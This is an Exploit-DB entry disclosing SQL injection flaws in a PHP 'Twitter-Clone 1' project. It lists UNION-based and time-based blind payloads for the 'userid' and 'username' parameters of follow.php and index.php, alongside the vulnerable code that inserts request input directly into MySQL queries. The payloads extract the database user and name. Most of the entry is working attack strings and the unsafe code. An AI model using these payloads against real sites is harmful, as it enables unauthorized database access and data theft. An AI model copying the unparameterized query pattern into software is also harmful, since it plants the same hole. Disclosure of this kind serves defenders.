Twitter-Clone 1 - 'userid' SQL Injection

EDB-ID:

45230

CVE:

N/A


Author:

L0RD

Type:

webapps


Platform:

PHP

Date:

2018-08-21


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: Twitter-Clone 1 - 'userid' SQL Injection
# Date: 2018-08-21
# Exploit Author: L0RD
# Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/
# Version: 1
# CVE: N/A
# Tested on: Win 10

# POC : SQLi
# vulnerable files : follow.php , index.php
# vulnerable parameters : userid , username

# 1) follow.php :

# Parameters : userid , username
# Type : Union query
# Type : Time-based blind
# Payloads :

userid: ' UNION SELECT 1,2,user(),4,database(),6,7%23
username: ' AND sleep(10)%23

# vulnerable code :

if($_GET['userid']  && $_GET['username']){
if($_GET['userid']!=$user_id){
$follow_userid = $_GET['userid'];
$follow_username = $_GET['username'];
include 'connect.php';
$query = mysqli_query($con, "SELECT id
    FROM following
WHERE user1_id='$user_id' AND user2_id='$follow_userid'
");

# 2) index.php :

# vulnerable parameter : username
# Type : Union query
# Payload : 

' union select 1,2,user(),4,5,6

# vulnerable code :

if($_POST['login-btn']=="login-submit"){
if($_POST['username'] != "" && $_POST['password'] != ""){
$username = strtolower($_POST['username']);
include "connect.php";
$query = mysqli_query($con, "SELECT id, password
FROM users
 WHERE username='$username'");